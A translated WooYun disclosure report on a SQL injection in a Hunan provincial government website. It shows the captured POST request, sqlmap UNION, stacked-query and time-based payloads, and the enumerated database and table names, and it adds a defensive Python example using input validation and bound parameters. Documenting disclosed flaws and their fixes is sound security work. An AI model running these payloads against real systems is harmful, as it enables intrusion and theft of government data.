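Vulnerability summary

Bug ID: wooyun-2015-0156754

Vulnerability title: SQL injection at the Hunan Administration for Industry and Commerce leaks a large amount of database information

Related vendor: cncert (National Internet Emergency Center)

Author: 路人甲

Submitted: 2015-12-01 00:44

Fixed: 2016-01-18 12:00

Disclosed: 2016-01-18 12:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]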


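Vulnerability details

Disclosure status:

2015-12-01: Details reported to the vendor; awaiting vendor handling
2015-12-04: Vendor has confirmed; details disclosed to the vendor only
2015-12-14: Details disclosed to core white hats and experts in related fields
2015-12-24: Details disclosed to regular white hats
2016-01-03: Details disclosed to trainee white hats
2016-01-18: Details disclosed to the public

Brief description:

RT

Detailed description:

0x01 Vulnerability location
Hunan Administration for Industry and Commerce

http://**.**.**.**/


0x02 Vulnerability description

SQL injection vulnerability: leaks a large amount of database information

POST injection

0x03 Test request parameters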

POST /visit/peopleandgov/a/moreQuestionList?unitecodeIndex=430000 HTTP/1.1
Content-Length: 176
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: JSESSIONID=38F4E74C1FFC190A395DE54C5E743C7A; pgv_pvi=5850027008; pgv_si=s6229789696; pgv_heid=1448640932500.1448640932500.1448640997914.2
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

hotkey=1&inHurdleid=-1&inPGid=0&isSearch=yes&pDateEnd=2015-10-16&pDateFrom=2015-10-16&repeatroleid=43000001&submit2=&title=Mr.


0x04 Test tool
Testing with sqlmap is sufficient.

Proof of vulnerability:

0x05

---
Place: POST
Parameter: inHurdleid
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: hotkey=1&inHurdleid=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(101)+CHAR(99)+CHAR(101)+CHAR(113)+CHAR(121)+CHAR(88)+CHAR(78)+CHAR(74)+CHAR(117)+CHAR(119)+CHAR(116)+CHAR(86)+CHAR(114)+CHAR(73)+CHAR(113)+CHAR(101)+CHAR(108)+CHAR(97)+CHAR(113),NULL,NULL,NULL,NULL,NULL-- &inPGid=0&isSearch=yes&pDateEnd=2015-10-16&pDateFrom=2015-10-16&repeatroleid=43000001&submit2=&title=Mr.
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: hotkey=1&inHurdleid=-1'; WAITFOR DELAY '0:0:5'--&inPGid=0&isSearch=yes&pDateEnd=2015-10-16&pDateFrom=2015-10-16&repeatroleid=43000001&submit2=&title=Mr.
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: hotkey=1&inHurdleid=-1' WAITFOR DELAY '0:0:5'--&inPGid=0&isSearch=yes&pDateEnd=2015-10-16&pDateFrom=2015-10-16&repeatroleid=43000001&submit2=&title=Mr.
---
[02:44:12] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[02:44:12] [INFO] fetching database names
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] Y
available databases [10]:
[*] BackupDatabase
[*] EnterpriseInfo
[*] master
[*] MicroChatForHnaic
[*] model
[*] msdb
[*] NewHnaicNet
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


Database: NewHnaicNet
[48 tables]
+-----------------------------+
| PRODUCT_CATEGORY |
| inputmark |
| sysdiagrams |
| tbattachment |
| tbblacklist |
| tbboard1 |
| tbcategory |
| tbcmzmmark |
| tbcollect |
| tbdatabase |
| tbddoslog |
| tbelecscreen |
| tbfile |
| tbforeignpeoplequestion |
| tbforeignpeoplequestiontype |
| tbforeignuser |
| tbforeignuser3 |
| tbgovinforpublicity |
| tbgroup |
| tbgroupboard |
| tbgroupcategory |
| tbhnaicknowledge |
| tbhnaicknowledge_sub |
| tbipunit |
| tbjoke |
| tbkeyword |
| tbleader |
| tbmessage |
| tbnetvoter |
| tbnetvoteroption |
| tbnews |
| tboperatlog |
| tbphonebook |
| tbphoto |
| tbplacard |
| tbpublic_interaction_log |
| tbrelationlink |
| tbreply |
| tbspecial |
| tbtopic |
| tbunit |
| tbunitgroup |
| tbuser |
| tbvisitanddirectvideo |
| tbvisitvideoquestion |
| tbworksystem |
| totalvoteforarea |
| vtreeoperate |
+-----------------------------+


0x06 Data

Database: NewHnaicNet
Table: tbuser
[294 entries]

Fix:

Filter keywords

Copyright notice: when reposting, please credit the source, 路人甲@乌云
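
Beyond keyword filtering, the `inHurdleid` injection shown above can be closed by validating each parameter against its expected type and passing the values to the query as bound parameters. The following is an added example, not part of the original report or the site's code: the parameter types are inferred from the sample request, and the `question` table, its columns and the use of SQLite in place of the SQL Server back end are assumptions.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Assumed types, inferred from the sample values in the request above.
INT = re.compile(r"-?[0-9]{1,10}")
DATE = re.compile(r"[0-9]{4}-[0-9]{2}-[0-9]{2}")
RULES = {"hotkey": INT, "inHurdleid": INT, "inPGid": INT,
         "repeatroleid": INT, "pDateFrom": DATE, "pDateEnd": DATE}

# Request bodies copied from the report: the normal one and the time-based payload.
TAIL = ("&inPGid=0&isSearch=yes&pDateEnd=2015-10-16&pDateFrom=2015-10-16"
        "&repeatroleid=43000001&submit2=&title=Mr.")
BENIGN = "hotkey=1&inHurdleid=-1" + TAIL
PAYLOAD = "hotkey=1&inHurdleid=-1' WAITFOR DELAY '0:0:5'--" + TAIL


def validate(body):
    """Return (typed values, names of parameters that failed validation)."""
    raw = parse_qs(body, keep_blank_values=True)
    clean, rejected = {}, []
    for name, rule in RULES.items():
        values = raw.get(name, [])
        # Exactly one value that matches the whole pattern; duplicates fail too.
        if len(values) == 1 and rule.fullmatch(values[0]):
            clean[name] = int(values[0]) if rule is INT else values[0]
        else:
            rejected.append(name)
    return clean, rejected


def demo_db():
    """Constructed in-memory table standing in for the real back end."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE question (hurdle_id INTEGER, posted TEXT, title TEXT)")
    db.execute("INSERT INTO question VALUES (-1, '2015-10-16', 'constructed row')")
    return db


def search(db, body):
    """Query only with validated values passed as bound parameters."""
    params, rejected = validate(body)
    if rejected:
        return None, rejected  # caller answers HTTP 400 and logs the names
    rows = db.execute(
        "SELECT title FROM question WHERE hurdle_id = ? AND posted BETWEEN ? AND ?",
        (params["inHurdleid"], params["pDateFrom"], params["pDateEnd"]),
    ).fetchall()
    return rows, rejected
```

The rejected parameter names are also a useful detection signal: a non-numeric `inHurdleid` in the access log marks a probing attempt even when the query is never reached.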


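Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-12-04 11:58

Vendor reply:

CNVD has confirmed the situation described and has passed it via CNCERT to the Hunan sub-center, which will coordinate follow-up handling with the organization that manages the website.

Latest status:

None yet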

